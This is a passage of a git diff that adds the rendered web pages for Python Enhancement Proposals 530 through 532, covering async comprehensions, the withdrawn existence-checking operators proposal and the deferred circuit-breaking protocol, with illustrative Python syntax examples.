+result = {await fun() async for fun in funcs}
+result = {fun: await fun() async for fun in funcs}
+
+result = [await fun() async for fun in funcs if await smth]
+result = {await fun() async for fun in funcs if await smth}
+result = {fun: await fun() async for fun in funcs if await smth}
+
+
+

This is only valid in async def function body.

+
+
+

Grammar Updates

+

The proposal requires one change on the grammar level: adding the +optional “async” keyword to comp_for:

+
comp_for: [ASYNC] 'for' exprlist 'in' or_test [comp_iter]
+
+
+

The comprehension AST node will have the new is_async argument.

+
+
+

Backwards Compatibility

+

The proposal is fully backwards compatible.

+
+
+
+

Acceptance

+

PEP 530 was accepted by Guido, September 6, 2016 [1].

+
+
+

Implementation

+

The implementation is tracked in issue 28008 [3]. The reference +implementation git repository is available at [2].

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Victor Stinner and Elvis Pranskevichus +for their feedback, code reviews, and discussions around this +PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0530.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0531/index.html b/pep-0531/index.html new file mode 100644 index 00000000000..a4a2d22e381 --- /dev/null +++ b/pep-0531/index.html @@ -0,0 +1,757 @@ + + + + + + + + PEP 531 – Existence checking operators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 531 – Existence checking operators

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2016
+
Python-Version:
+
3.7
+
Post-History:
+
28-Oct-2016
+
+
+
+
Table of Contents +
+
+

Abstract

+

Inspired by PEP 505 and the related discussions, this PEP proposes the addition +of two new control flow operators to Python:

+
    +
  • Existence-checking precondition (“exists-then”): expr1 ?then expr2
  • +
  • Existence-checking fallback (“exists-else”): expr1 ?else expr2
  • +
+

as well as the following abbreviations for common existence checking +expressions and statements:

+
    +
  • Existence-checking attribute access: +obj?.attr (for obj ?then obj.attr)
  • +
  • Existence-checking subscripting: +obj?[expr] (for obj ?then obj[expr])
  • +
  • Existence-checking assignment: +value ?= expr (for value = value ?else expr)
  • +
+

The common ? symbol in these new operator definitions indicates that they +use a new “existence checking” protocol rather than the established +truth-checking protocol used by if statements, while loops, comprehensions, +generator expressions, conditional expressions, logical conjunction, and +logical disjunction.

+

This new protocol would be made available as operator.exists, with the +following characteristics:

+
    +
  • types can define a new __exists__ magic method (Python) or +tp_exists slot (C) to override the default behaviour. This optional +method has the same signature and possible return values as __bool__.
  • +
  • operator.exists(None) returns False
  • +
  • operator.exists(NotImplemented) returns False
  • +
  • operator.exists(Ellipsis) returns False
  • +
  • float, complex and decimal.Decimal will override the existence +check such that NaN values return False and other values (including +zero values) return True
  • +
  • for any other type, operator.exists(obj) returns True by default. Most +importantly, values that evaluate to False in a truth checking context +(zeroes, empty containers) will still evaluate to True in an existence +checking context
  • +
+
+
+

PEP Withdrawal

+

When posting this PEP for discussion on python-ideas [4], I asked reviewers to +consider 3 high level design questions before moving on to considering the +specifics of this particular syntactic proposal:

+

1. Do we collectively agree that “existence checking” is a useful +general concept that exists in software development and is distinct +from the concept of “truth checking”? +2. Do we collectively agree that the Python ecosystem would benefit +from an existence checking protocol that permits generalisation of +algorithms (especially short circuiting ones) across different “data +missing” indicators, including those defined in the language +definition, the standard library, and custom user code? +3. Do we collectively agree that it would be easier to use such a +protocol effectively if existence-checking equivalents to the +truth-checking “and” and “or” control flow operators were available?

+

While the answers to the first question were generally positive, it quickly +became clear that the answer to the second question is “No”.

+

Steven D’Aprano articulated the counter-argument well in [5], but the general +idea is that when checking for “missing data” sentinels, we’re almost always +looking for a specific sentinel value, rather than any sentinel value.

+

NotImplemented exists, for example, due to None being a potentially +legitimate result from overloaded arithmetic operators and exception +handling imposing too much runtime overhead to be useful for operand coercion.

+

Similarly, Ellipsis exists for multi-dimensional slicing support due to +None already have another meaning in a slicing context (indicating the use +of the default start or stop indices, or the default step size).

+

In mathematics, the value of NaN is that programmatically it behaves +like a normal value of its type (e.g. exposing all the usual attributes and +methods), while arithmetically it behaves according to the mathematical rules +for handling NaN values.

+

With that core design concept invalidated, the proposal as a whole doesn’t +make sense, and it is accordingly withdrawn.

+

However, the discussion of the proposal did prompt consideration of a potential +protocol based approach to make the existing and, or and if-else +operators more flexible [6] without introducing any new syntax, so I’ll be +writing that up as another possible alternative to PEP 505.

+
+
+

Relationship with other PEPs

+

While this PEP was inspired by and builds on Mark Haase’s excellent work in +putting together PEP 505, it ultimately competes with that PEP due to +significant differences in the specifics of the proposed syntax and semantics +for the feature.

+

It also presents a different perspective on the rationale for the change by +focusing on the benefits to existing Python users as the typical demands of +application and service development activities are genuinely changing. It +isn’t an accident that similar features are now appearing in multiple +programming languages, and while it’s a good idea for us to learn from how other +language designers are handling the problem, precedents being set elsewhere +are more relevant to how we would go about tackling this problem than they +are to whether or not we think it’s a problem we should address in the first +place.

+
+
+

Rationale

+
+

Existence checking expressions

+

An increasingly common requirement in modern software development is the need +to work with “semi-structured data”: data where the structure of the data is +known in advance, but pieces of it may be missing at runtime, and the software +manipulating that data is expected to degrade gracefully (e.g. by omitting +results that depend on the missing data) rather than failing outright.

+

Some particularly common cases where this issue arises are:

+
    +
  • handling optional application configuration settings and function parameters
  • +
  • handling external service failures in distributed systems
  • +
  • handling data sets that include some partial records
  • +
+

It is the latter two cases that are the primary motivation for this PEP - while +needing to deal with optional configuration settings and parameters is a design +requirement at least as old as Python itself, the rise of public cloud +infrastructure, the development of software systems as collaborative networks +of distributed services, and the availability of large public and private data +sets for analysis means that the ability to degrade operations gracefully in +the face of partial service failures or partial data availability is becoming +an essential feature of modern programming environments.

+

At the moment, writing such software in Python can be genuinely awkward, as +your code ends up littered with expressions like:

+
    +
  • value1 = expr1.field.of.interest if expr1 is not None else None
  • +
  • value2 = expr2["field"]["of"]["interest"] if expr2 is not None else None
  • +
  • value3 = expr3 if expr3 is not None else expr4 if expr4 is not None else expr5
  • +
+

If these are only occasional, then expanding out to full statement forms may +help improve readability, but if you have 4 or 5 of them in a row (which is a +fairly common situation in data transformation pipelines), then replacing them +with 16 or 20 lines of conditional logic really doesn’t help matters.

+

Expanding the three examples above that way hopefully helps illustrate that:

+
if expr1 is not None:
+    value1 = expr1.field.of.interest
+else:
+    value1 = None
+if expr2 is not None:
+    value2 = expr2["field"]["of"]["interest"]
+else:
+    value2 = None
+if expr3 is not None:
+    value3 = expr3
+else:
+    if expr4 is not None:
+        value3 = expr4
+    else:
+        value3 = expr5
+
+
+

The combined impact of the proposals in this PEP is to allow the above sample +expressions to instead be written as:

+
    +
  • value1 = expr1?.field.of.interest
  • +
  • value2 = expr2?["field"]["of"]["interest"]
  • +
  • value3 = expr3 ?else expr4 ?else expr5
  • +
+

In these forms, almost all of the information presented to the reader is +immediately relevant to the question “What does this code do?”, while the +boilerplate code to handle missing data by passing it through to the output +or falling back to an alternative input, has shrunk to two uses of the ? +symbol and two uses of the ?else keyword.

+

In the first two examples, the 31 character boilerplate clause +if exprN is not None else None (minimally 27 characters for a single letter +variable name) has been replaced by a single ? character, substantially +improving the signal-to-pattern-noise ratio of the lines (especially if it +encourages the use of more meaningful variable and field names rather than +making them shorter purely for the sake of expression brevity).

+

In the last example, two instances of the 21 character boilerplate, +if exprN is not None (minimally 17 characters) are replaced with single +characters, again substantially improving the signal-to-pattern-noise ratio.

+

Furthermore, each of our 5 “subexpressions of potential interest” is included +exactly once, rather than 4 of them needing to be duplicated or pulled out +to a named variable in order to first check if they exist.

+

The existence checking precondition operator is mainly defined to provide a +clear conceptual basis for the existence checking attribute access and +subscripting operators:

+
    +
  • obj?.attr is roughly equivalent to obj ?then obj.attr
  • +
  • obj?[expr] is roughly equivalent to obj ?then obj[expr]
  • +
+

The main semantic difference between the shorthand forms and their expanded +equivalents is that the common subexpression to the left of the existence +checking operator is evaluated only once in the shorthand form (similar to +the benefit offered by augmented assignment statements).

+
+
+

Existence checking assignment

+

Existence-checking assignment is proposed as a relatively straightforward +expansion of the concepts in this PEP to also cover the common configuration +handling idiom:

+
    +
  • value = value if value is not None else expensive_default()
  • +
+

by allowing that to instead be abbreviated as:

+
    +
  • value ?= expensive_default()
  • +
+

This is mainly beneficial when the target is a subscript operation or +subattribute, as even without this specific change, the PEP would still +permit this idiom to be updated to:

+
    +
  • value = value ?else expensive_default()
  • +
+

The main argument against adding this form is that it’s arguably ambiguous +and could mean either:

+
    +
  • value = value ?else expensive_default(); or
  • +
  • value = value ?then value.subfield.of.interest
  • +
+

The second form isn’t at all useful, but if this concern was deemed significant +enough to address while still keeping the augmented assignment feature, +the full keyword could be included in the syntax:

+
    +
  • value ?else= expensive_default()
  • +
+

Alternatively, augmented assignment could just be dropped from the current +proposal entirely and potentially reconsidered at a later date.

+
+
+

Existence checking protocol

+

The existence checking protocol is including in this proposal primarily to +allow for proxy objects (e.g. local representations of remote resources) and +mock objects used in testing to correctly indicate non-existence of target +resources, even though the proxy or mock object itself is not None.

+

However, with that protocol defined, it then seems natural to expand it to +provide a type independent way of checking for NaN values in numeric types +- at the moment you need to be aware of the exact data type you’re working with +(e.g. builtin floats, builtin complex numbers, the decimal module) and use the +appropriate operation (e.g. math.isnan, cmath.isnan, +decimal.getcontext().is_nan(), respectively)

+

Similarly, it seems reasonable to declare that the other placeholder builtin +singletons, Ellipsis and NotImplemented, also qualify as objects that +represent the absence of data more so than they represent data.

+
+
+

Proposed symbolic notation

+

Python has historically only had one kind of implied boolean context: truth +checking, which can be invoked directly via the bool() builtin. As this PEP +proposes a new kind of control flow operation based on existence checking rather +than truth checking, it is considered valuable to have a reminder directly +in the code when existence checking is being used rather than truth checking.

+

The mathematical symbol for existence assertions is U+2203 ‘THERE EXISTS’:

+

Accordingly, one possible approach to the syntactic additions proposed in this +PEP would be to use that already defined mathematical notation:

+
    +
  • expr1 ∃then expr2
  • +
  • expr1 ∃else expr2
  • +
  • obj∃.attr
  • +
  • obj∃[expr]
  • +
  • target ∃= expr
  • +
+

However, there are two major problems with that approach, one practical, and +one pedagogical.

+

The practical problem is the usual one that most keyboards don’t offer any easy +way of entering mathematical symbols other than those used in basic arithmetic +(even the symbols appearing in this PEP were ultimately copied & pasted +from [3] rather than being entered directly).

+

The pedagogical problem is that the symbols for existence assertions () +and universal assertions () aren’t going to be familiar to most people +the way basic arithmetic operators are, so we wouldn’t actually be making the +proposed syntax easier to understand by adopting .

+

By contrast, ? is one of the few remaining unused ASCII punctuation +characters in Python’s syntax, making it available as a candidate syntactic +marker for “this control flow operation is based on an existence check, not a +truth check”.

+

Taking that path would also have the advantage of aligning Python’s syntax +with corresponding syntax in other languages that offer similar features.

+

Drawing from the existing summary in PEP 505 and the Wikipedia articles on +the “safe navigation operator [1] and the “null coalescing operator” [2], +we see:

+
    +
  • The ?. existence checking attribute access syntax precisely aligns with:
      +
    • the “safe navigation” attribute access operator in C# (?.)
    • +
    • the “optional chaining” operator in Swift (?.)
    • +
    • the “safe navigation” attribute access operator in Groovy (?.)
    • +
    • the “conditional member access” operator in Dart (?.)
    • +
    +
  • +
  • The ?[] existence checking attribute access syntax precisely aligns with:
      +
    • the “safe navigation” subscript operator in C# (?[])
    • +
    • the “optional subscript” operator in Swift (?[].)
    • +
    +
  • +
  • The ?else existence checking fallback syntax semantically aligns with:
      +
    • the “null-coalescing” operator in C# (??)
    • +
    • the “null-coalescing” operator in PHP (??)
    • +
    • the “nil-coalescing” operator in Swift (??)
    • +
    +
  • +
+

To be clear, these aren’t the only spelling of these operators used in other +languages, but they’re the most common ones, and the ? symbol is the most +common syntactic marker by far (presumably prompted by the use of ? to +introduce the “then” clause in C-style conditional expressions, which many +of these languages also offer).

+
+
+

Proposed keywords

+

Given the symbolic marker ?, it would be syntactically unambiguous to spell +the existence checking precondition and fallback operations using the same +keywords as their truth checking counterparts:

+
    +
  • expr1 ?and expr2 (instead of expr1 ?then expr2)
  • +
  • expr1 ?or expr2 (instead of expr1 ?else expr2)
  • +
+

However, while syntactically unambiguous when written, this approach makes +the code incredibly hard to pronounce (What’s the pronunciation of “?”?) and +also hard to describe (given reused keywords, there’s no obvious shorthand +terms for “existence checking precondition (?and)” and “existence checking +fallback (?or)” that would distinguish them from “logical conjunction (and)” +and “logical disjunction (or)”).

+

We could try to encourage folks to pronounce the ? symbol as “exists”, +making the shorthand names the “exists-and expression” and the +“exists-or expression”, but there’d be no way of guessing those names purely +from seeing them written in a piece of code.

+

Instead, this PEP takes advantage of the proposed symbolic syntax to introduce +a new keyword (?then) and borrow an existing one (?else) in a way +that allows people to refer to “then expressions” and “else expressions” +without ambiguity.

+

These keywords also align well with the conditional expressions that are +semantically equivalent to the proposed expressions.

+

For ?else expressions, expr1 ?else expr2 is equivalent to:

+
_lhs_result = expr1
+_lhs_result if operator.exists(_lhs_result) else expr2
+
+
+

Here the parallel is clear, since the else expr2 appears at the end of +both the abbreviated and expanded forms.

+

For ?then expressions, expr1 ?then expr2 is equivalent to:

+
_lhs_result = expr1
+expr2 if operator.exists(_lhs_result) else _lhs_result
+
+
+

Here the parallel isn’t as immediately obvious due to Python’s traditionally +anonymous “then” clauses (introduced by : in if statements and suffixed +by if in conditional expressions), but it’s still reasonably clear as long +as you’re already familiar with the “if-then-else” explanation of conditional +control flow.

+
+
+
+

Risks and concerns

+
+

Readability

+

Learning to read and write the new syntax effectively mainly requires +internalising two concepts:

+
    +
  • expressions containing ? include an existence check and may short circuit
  • +
  • if None or another “non-existent” value is an expected input, and the +correct handling is to propagate that to the result, then the existence +checking operators are likely what you want
  • +
+

Currently, these concepts aren’t explicitly represented at the language level, +so it’s a matter of learning to recognise and use the various idiomatic +patterns based on conditional expressions and statements.

+
+
+

Magic syntax

+

There’s nothing about ? as a syntactic element that inherently suggests +is not None or operator.exists. The main current use of ? as a +symbol in Python code is as a trailing suffix in IPython environments to +request help information for the result of the preceding expression.

+

However, the notion of existence checking really does benefit from a pervasive +visual marker that distinguishes it from truth checking, and that calls for +a single-character symbolic syntax if we’re going to do it at all.

+
+
+

Conceptual complexity

+

This proposal takes the currently ad hoc and informal concept of “existence +checking” and elevates it to the status of being a syntactic language feature +with a clearly defined operator protocol.

+

In many ways, this should actually reduce the overall conceptual complexity +of the language, as many more expectations will map correctly between truth +checking with bool(expr) and existence checking with +operator.exists(expr) than currently map between truth checking and +existence checking with expr is not None (or expr is not NotImplemented +in the context of operand coercion, or the various NaN-checking operations +in mathematical libraries).

+

As a simple example of the new parallels introduced by this PEP, compare:

+
all_are_true = all(map(bool, iterable))
+at_least_one_is_true = any(map(bool, iterable))
+all_exist = all(map(operator.exists, iterable))
+at_least_one_exists = any(map(operator.exists, iterable))
+
+
+
+
+
+

Design Discussion

+
+

Subtleties in chaining existence checking expressions

+

Similar subtleties arise in chaining existence checking expressions as already +exist in chaining logical operators: the behaviour can be surprising if the +right hand side of one of the expressions in the chain itself returns a +value that doesn’t exist.

+

As a result, value = arg1 ?then f(arg1) ?else default() would be dubious for +essentially the same reason that value = cond and expr1 or expr2 is dubious: +the former will evaluate default() if f(arg1) returns None, just +as the latter will evaluate expr2 if expr1 evaluates to False in +a boolean context.

+
+
+

Ambiguous interaction with conditional expressions

+

In the proposal as currently written, the following is a syntax error:

+
    +
  • value = f(arg) if arg ?else default
  • +
+

While the following is a valid operation that checks a second condition if the +first doesn’t exist rather than merely being false:

+
    +
  • value = expr1 if cond1 ?else cond2 else expr2
  • +
+

The expression chaining problem described above means that the argument can be +made that the first operation should instead be equivalent to:

+
    +
  • value = f(arg) if operator.exists(arg) else default
  • +
+

requiring the second to be written in the arguably clearer form:

+
    +
  • value = expr1 if (cond1 ?else cond2) else expr2
  • +
+

Alternatively, the first form could remain a syntax error, and the existence +checking symbol could instead be attached to the if keyword:

+
    +
  • value = expr1 if? cond else expr2
  • +
+
+
+

Existence checking in other truth-checking contexts

+

The truth-checking protocol is currently used in the following syntactic +constructs:

+
    +
  • logical conjunction (and-expressions)
  • +
  • logical disjunction (or-expressions)
  • +
  • conditional expressions (if-else expressions)
  • +
  • if statements
  • +
  • while loops
  • +
  • filter clauses in comprehensions and generator expressions
  • +
+

In the current PEP, switching from truth-checking with and and or to +existence-checking is a matter of substituting in the new keywords, ?then +and ?else in the appropriate places.

+

For other truth-checking contexts, it proposes either importing and +using the operator.exists API, or else continuing with the current idiom +of checking specifically for expr is not None (or the context appropriate +equivalent).

+

The simplest possible enhancement in that regard would be to elevate the +proposed exists() API from an operator module function to a new builtin +function.

+

Alternatively, the ? existence checking symbol could be supported as a +modifier on the if and while keywords to indicate the use of an +existence check rather than a truth check.

+

However, it isn’t at all clear that the potential consistency benefits gained +for either suggestion would justify the additional disruption, so they’ve +currently been omitted from the proposal.

+
+
+

Defining expected invariant relations between __bool__ and __exists__

+

The PEP currently leaves the definition of __bool__ on all existing types +unmodified, which ensures the entire proposal remains backwards compatible, +but results in the following cases where bool(obj) returns True, but +the proposed operator.exists(obj) would return False:

+
    +
  • NaN values for float, complex, and decimal.Decimal
  • +
  • Ellipsis
  • +
  • NotImplemented
  • +
+

The main argument for potentially changing these is that it becomes easier to +reason about potential code behaviour if we have a recommended invariant in +place saying that values which indicate they don’t exist in an existence +checking context should also report themselves as being False in a truth +checking context.

+

Failing to define such an invariant would lead to arguably odd outcomes like +float("NaN") ?else 0.0 returning 0.0 while float("NaN") or 0.0 +returns NaN.

+
+
+
+

Limitations

+
+

Arbitrary sentinel objects

+

This proposal doesn’t attempt to provide syntactic support for the “sentinel +object” idiom, where None is a permitted explicit value, so a +separate sentinel object is defined to indicate missing values:

+
_SENTINEL = object()
+def f(obj=_SENTINEL):
+    return obj if obj is not _SENTINEL else default_value()
+
+
+

This could potentially be supported at the expense of making the existence +protocol definition significantly more complex, both to define and to use:

+
    +
  • at the Python layer, operator.exists and __exists__ implementations +would return the empty tuple to indicate non-existence, and otherwise return +a singleton tuple containing a reference to the object to be used as the +result of the existence check
  • +
  • at the C layer, tp_exists implementations would return NULL to indicate +non-existence, and otherwise return a PyObject * pointer as the +result of the existence check
  • +
+

Given that change, the sentinel object idiom could be rewritten as:

+
class Maybe:
+  SENTINEL = object()
+  def __init__(self, value):
+      self._result = (value,) is value is not self.SENTINEL else ()
+  def __exists__(self):
+      return self._result
+
+def f(obj=Maybe.SENTINEL):
+    return Maybe(obj) ?else default_value()
+
+
+

However, I don’t think cases where the 3 proposed standard sentinel values (i.e. +None, Ellipsis and NotImplemented) can’t be used are going to be +anywhere near common enough for the additional protocol complexity and the loss +of symmetry between __bool__ and __exists__ to be worth it.

+
+
+
+

Specification

+

The Abstract already gives the gist of the proposal and the Rationale gives +some specific examples. If there’s enough interest in the basic idea, then a +full specification will need to provide a precise correspondence between the +proposed syntactic sugar and the underlying conditional expressions that is +sufficient to guide the creation of a reference implementation.

+

…TBD…

+
+
+

Implementation

+

As with PEP 505, actual implementation has been deferred pending in-principle +interest in the idea of adding these operators - the implementation isn’t +the hard part of these proposals, the hard part is deciding whether or not +this is a change where the long term benefits for new and existing Python users +outweigh the short term costs involved in the wider ecosystem (including +developers of other implementations, language curriculum developers, and +authors of other Python related educational material) adjusting to the change.

+

…TBD…

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0531.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0532/index.html b/pep-0532/index.html new file mode 100644 index 00000000000..84dd5674bb4 --- /dev/null +++ b/pep-0532/index.html @@ -0,0 +1,1000 @@ + + + + + + + + PEP 532 – A circuit breaking protocol and binary operators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 532 – A circuit breaking protocol and binary operators

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Mark E. Haase <mehaase at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
30-Oct-2016
+
Python-Version:
+
3.8
+
Post-History:
+
05-Nov-2016
+
+
+
+
Table of Contents +
+
+

PEP Deferral

+

Further consideration of this PEP has been deferred until Python 3.8 at the +earliest.

+
+
+

Abstract

+

Inspired by PEP 335, PEP 505, PEP 531, and the related discussions, this PEP +proposes the definition of a new circuit breaking protocol (using the +method names __then__ and __else__) that provides a common underlying +semantic foundation for:

+
    +
  • conditional expressions: LHS if COND else RHS
  • +
  • logical conjunction: LHS and RHS
  • +
  • logical disjunction: LHS or RHS
  • +
  • the None-aware operators proposed in PEP 505
  • +
  • the rich comparison chaining model proposed in PEP 535
  • +
+

Taking advantage of the new protocol, it further proposes that the definition +of conditional expressions be revised to also permit the use of if and +else respectively as right-associative and left-associative general +purpose short-circuiting operators:

+
    +
  • Right-associative short-circuiting: LHS if RHS
  • +
  • Left-associative short-circuiting: LHS else RHS
  • +
+

In order to make logical inversion (not EXPR) consistent with the above +changes, it also proposes the introduction of a new logical inversion protocol +(using the method name __not__).

+

To force short-circuiting of a circuit breaker without having to evaluate +the expression creating it twice, a new operator.short_circuit(obj) +helper function will be added to the operator module.

+

Finally, a new standard types.CircuitBreaker type is proposed to decouple +an object’s truth value (as used to determine control flow) from the value +it returns from short-circuited circuit breaking expressions, with the +following factory functions added to the operator module to represent +particularly common switching idioms:

+
    +
  • switching on bool(obj): operator.true(obj)
  • +
  • switching on not bool(obj): operator.false(obj)
  • +
  • switching on obj is value: operator.is_sentinel(obj, value)
  • +
  • switching on obj is not value: operator.is_not_sentinel(obj, value)
  • +
+
+
+

Relationship with other PEPs

+

This PEP builds on an extended history of work in other proposals. Some of +the key proposals are discussed below.

+
+

PEP 531: Existence checking protocol

+

This PEP is a direct successor to PEP 531, replacing the existence checking +protocol and the new ?then and ?else syntactic operators defined there +with the new circuit breaking protocol and adjustments to conditional +expressions and the not operator.

+
+
+

PEP 505: None-aware operators

+

This PEP complements the None-aware operator proposals in PEP 505, by offering +an underlying protocol-driven semantic framework that explains their +short-circuiting behaviour as highly optimised syntactic sugar for particular +uses of conditional expressions.

+

Given the changes proposed by this PEP:

+
    +
  • LHS ?? RHS would roughly be is_not_sentinel(LHS, None) else RHS
  • +
  • EXPR?.attr would roughly be EXPR.attr if is_not_sentinel(EXPR, None)
  • +
  • EXPR?[key] would roughly be EXPR[key] if is_not_sentinel(EXPR, None)
  • +
+

In all three cases, the dedicated syntactic form would be optimised to avoid +actually creating the circuit breaker instance and instead implement the +underlying control flow directly. In the latter two cases, the syntactic form +would also avoid evaluating EXPR twice.

+

This means that while the None-aware operators would remain highly specialised +and specific to None, other sentinel values would still be usable through the +more general protocol-driven proposal in this PEP.

+
+
+

PEP 335: Overloadable Boolean operators

+

PEP 335 proposed the ability to overload the short-circuiting and and +or operators directly, with the ability to overload the semantics of +comparison chaining being one of the consequences of that change. The +proposal in an earlier version of this PEP to instead handle the element-wise +comparison use case by changing the semantic definition of comparison chaining +is drawn directly from Guido’s rejection of PEP 335 [1].

+

However, initial feedback on this PEP indicated that the number of different +proposals that it covered made it difficult to read, so that part of the +proposal has been separated out as PEP 535.

+
+
+

PEP 535: Rich comparison chaining

+

As noted above, PEP 535 is a proposal to build on the circuit breaking protocol +defined in this PEP in order to expand the rich comparison support introduced +in PEP 207 to also handle comparison chaining operations like +LEFT_BOUND < VALUE < RIGHT_BOUND.

+
+
+
+

Specification

+
+

The circuit breaking protocol (if-else)

+

Conditional expressions (LHS if COND else RHS) are currently interpreted +as an expression level equivalent to:

+
if COND:
+    _expr_result = LHS
+else:
+    _expr_result = RHS
+
+
+

This PEP proposes changing that expansion to allow the checked condition to +implement a new “circuit breaking” protocol that allows it to see, and +potentially alter, the result of either or both branches of the expression:

+
_cb = COND
+_type_cb = type(cb)
+if _cb:
+    _expr_result = LHS
+    if hasattr(_type_cb, "__then__"):
+        _expr_result = _type_cb.__then__(_cb, _expr_result)
+else:
+    _expr_result = RHS
+    if hasattr(_type_cb, "__else__"):
+        _expr_result = _type_cb.__else__(_cb, _expr_result)
+
+
+

As shown, interpreter implementations would be required to access only the +protocol method needed for the branch of the conditional expression that is +actually executed. Consistent with other protocol methods, the special methods +would be looked up via the circuit breaker’s type, rather than directly on the +instance.

+
+
+

Circuit breaking operators (binary if and binary else)

+

The proposed name of the protocol doesn’t come from the proposed changes to +the semantics of conditional expressions. Rather, it comes from the proposed +addition of if and else as general purpose protocol driven +short-circuiting operators to complement the existing True and False +based short-circuiting operators (or and and, respectively) as well +as the None based short-circuiting operator proposed in PEP 505 (??).

+

Together, these two operators would be known as the circuit breaking operators.

+

In order to support this usage, the definition of conditional expressions in +the language grammar would be updated to make both the if clause and +the else clause optional:

+
test: else_test ['if' or_test ['else' test]] | lambdef
+else_test: or_test ['else' test]
+
+
+

Note that we would need to avoid the apparent simplification to +else_test ('if' else_test)* in order to make it easier for compiler +implementations to correctly preserve the semantics of normal conditional +expressions.

+

The definition of the test_nocond node in the grammar (which deliberately +excludes conditional expressions) would remain unchanged, so the circuit +breaking operators would require parentheses when used in the if +clause of comprehensions and generator expressions just as conditional +expressions themselves do.

+

This grammar definition means precedence/associativity in the otherwise +ambiguous case of expr1 if cond else expr2 else expr3 resolves as +(expr1 if cond else expr2) else epxr3. However, a guideline will also be +added to PEP 8 to say “don’t do that”, as such a construct will be inherently +confusing for readers, regardless of how the interpreter executes it.

+

The right-associative circuit breaking operator (LHS if RHS) would then +be expanded as follows:

+
_cb = RHS
+_expr_result = LHS if _cb else _cb
+
+
+

While the left-associative circuit breaking operator (LHS else RHS) would +be expanded as:

+
_cb = LHS
+_expr_result = _cb if _cb else RHS
+
+
+

The key point to note in both cases is that when the circuit breaking +expression short-circuits, the condition expression is used as the result of +the expression unless the condition is a circuit breaker. In the latter +case, the appropriate circuit breaker protocol method is called as usual, but +the circuit breaker itself is supplied as the method argument.

+

This allows circuit breakers to reliably detect short-circuiting by checking +for cases when the argument passed in as the candidate expression result is +self.

+
+
+

Overloading logical inversion (not)

+

Any circuit breaker definition will have a logical inverse that is still a +circuit breaker, but inverts the answer as to when to short circuit the +expression evaluation. For example, the operator.true and +operator.false circuit breakers proposed in this PEP are each other’s +logical inverse.

+

A new protocol method, __not__(self), will be introduced to permit circuit +breakers and other types to override not expressions to return their +logical inverse rather than a coerced boolean result.

+

To preserve the semantics of existing language optimisations (such as +eliminating double negations directly in a boolean context as redundant), +__not__ implementations will be required to respect the following +invariant:

+
assert not bool(obj) == bool(not obj)
+
+
+

However, symmetric circuit breakers (those that implement all of __bool__, +__not__, __then__ and __else__) would only be expected to respect +the full semantics of boolean logic when all circuit breakers involved in the +expression are using a consistent definition of “truth”. This is covered +further in Respecting De Morgan’s Laws.

+
+
+

Forcing short-circuiting behaviour

+

Invocation of a circuit breaker’s short-circuiting behaviour can be forced by +using it as all three operands in a conditional expression:

+
obj if obj else obj
+
+
+

Or, equivalently, as both operands in a circuit breaking expression:

+
obj if obj
+obj else obj
+
+
+

Rather than requiring the using of any of these patterns, this PEP proposes +to add a dedicated function to the operator to explicitly short-circuit +a circuit breaker, while passing other objects through unmodified:

+
def short_circuit(obj)
+    """Replace circuit breakers with their short-circuited result
+
+    Passes other input values through unmodified.
+    """
+    return obj if obj else obj
+
+
+
+
+

Circuit breaking identity comparisons (is and is not)

+

In the absence of any standard circuit breakers, the proposed if and +else operators would largely just be unusual spellings of the existing +and and or logical operators.

+

However, this PEP further proposes to provide a new general purpose +types.CircuitBreaker type that implements the appropriate short +circuiting logic, as well as factory functions in the operator module +that correspond to the is and is not operators.

+

These would be defined in such a way that the following expressions produce +VALUE rather than False when the conditional check fails:

+
EXPR if is_sentinel(VALUE, SENTINEL)
+EXPR if is_not_sentinel(VALUE, SENTINEL)
+
+
+

And similarly, these would produce VALUE rather than True when the +conditional check succeeds:

+
is_sentinel(VALUE, SENTINEL) else EXPR
+is_not_sentinel(VALUE, SENTINEL) else EXPR
+
+
+

In effect, these comparisons would be defined such that the leading +VALUE if and trailing else VALUE clauses can be omitted as implied in +expressions of the following forms:

+
# To handle "if" expressions, " else VALUE" is implied when omitted
+EXPR if is_sentinel(VALUE, SENTINEL) else VALUE
+EXPR if is_not_sentinel(VALUE, SENTINEL) else VALUE
+# To handle "else" expressions, "VALUE if " is implied when omitted
+VALUE if is_sentinel(VALUE, SENTINEL) else EXPR
+VALUE if is_not_sentinel(VALUE, SENTINEL) else EXPR
+
+
+

The proposed types.CircuitBreaker type would represent this behaviour +programmatically as follows:

+
class CircuitBreaker:
+    """Simple circuit breaker type"""
+    def __init__(self, value, bool_value):
+        self.value = value
+        self.bool_value = bool(bool_value)
+    def __bool__(self):
+        return self.bool_value
+    def __not__(self):
+        return CircuitBreaker(self.value, not self.bool_value)
+    def __then__(self, result):
+        if result is self:
+            return self.value
+        return result
+    def __else__(self, result):
+        if result is self:
+            return self.value
+        return result
+
+
+

The key characteristic of these circuit breakers is that they are ephemeral: +when they are told that short circuiting has taken place (by receiving a +reference to themselves as the candidate expression result), they return the +original value, rather than the circuit breaking wrapper.

+

The short-circuiting detection is defined such that the wrapper will always +be removed if you explicitly pass the same circuit breaker instance to both +sides of a circuit breaking operator or use one as all three operands in a +conditional expression:

+
breaker = types.CircuitBreaker(foo, foo is None)
+assert operator.short_circuit(breaker) is foo
+assert (breaker if breaker) is foo
+assert (breaker else breaker) is foo
+assert (breaker if breaker else breaker) is foo
+breaker = types.CircuitBreaker(foo, foo is not None)
+assert operator.short_circuit(breaker) is foo
+assert (breaker if breaker) is foo
